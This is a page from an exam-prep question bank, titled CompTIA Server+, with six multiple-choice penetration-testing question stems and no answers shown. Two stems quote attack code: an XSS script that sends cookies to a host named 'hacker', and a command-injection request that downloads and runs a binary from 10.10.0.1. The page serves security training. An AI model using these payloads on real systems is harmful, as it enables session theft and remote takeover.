Exam 13: CompTIA Server+

arrow
  • Select Tags
search iconSearch Question
flashcardsStudy Flashcards
  • Select Tags

An assessment has been completed, and all reports and evidence have been turned over to the client. Which of the following should be done NEXT to ensure the confidentiality of the client's information?

(Multiple Choice)
4.9/5
(37)

A company becomes concerned when the security alarms are triggered during a penetration test. Which of the following should the company do NEXT?

(Multiple Choice)
4.8/5
(37)

Given the following code: <SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;</SCRIPT> Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)

(Multiple Choice)
4.8/5
(32)

Which of the following is the MOST effective person to validate results from a penetration test?

(Multiple Choice)
4.8/5
(42)

A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized: exploit = "POST " exploit += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} - c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apache'%0A%27&loginUser=a&Pwd=a" exploit += "HTTP/1.1" Which of the following commands should the penetration tester run post-engagement?

(Multiple Choice)
4.9/5
(31)

Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.)

(Multiple Choice)
4.8/5
(39)
Showing 61 - 66 of 66
close modal

Filters

  • Essay(0)
  • Multiple Choice(0)
  • Short Answer(0)
  • True False(0)
  • Matching(0)